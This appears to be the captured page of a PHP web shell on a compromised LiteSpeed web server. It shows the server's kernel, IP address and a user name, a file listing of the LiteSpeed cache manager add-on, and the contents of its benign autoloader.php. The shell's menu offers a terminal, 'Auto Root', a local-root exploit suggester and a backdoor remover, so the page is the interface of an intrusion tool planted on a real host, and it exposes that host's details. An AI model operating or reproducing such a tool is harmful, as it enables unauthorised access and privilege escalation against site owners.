Linux 162-55-97-189.cprapid.com 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 162.55.97.189 & Your IP : 216.73.216.182
Domains :
Cant Read [ /etc/named.conf ]
User : kavci
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
add-ons /
webcachemgr /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxr-x
2026-06-19 06:27
VERSION
9
B
-rw-rw-r--
2026-06-19 06:27
autoloader.php
885
B
-rw-rw-r--
2026-06-19 06:27
bootstrap.php
513
B
-rw-rw-r--
2026-06-19 06:27
bootstrap_cli.php
746
B
-rw-rw-r--
2026-06-19 06:27
Save
Rename
<?php /* * ********************************************* * LiteSpeed Web Server Cache Manager * @Author: LiteSpeed Technologies, Inc. (https://www.litespeedtech.com) * @Copyright: (c) 2018 * ******************************************* */ spl_autoload_register(function($class) { /** * project-specific namespace prefix */ $prefix = 'Lsc\\Wp\\'; /** * base directory for the namespace prefix */ $base_dir = __DIR__ . '/src/'; $len = strlen($prefix); if ( strncmp($prefix, $class, $len) !== 0 ) { /** * Class use the namespace prefix, * move to the next registered autoloader. */ return; } $relative_class_name = substr($class, $len); $file = $base_dir . str_replace('\\', '/', $relative_class_name) . '.php'; if ( file_exists($file) ) { require $file; } });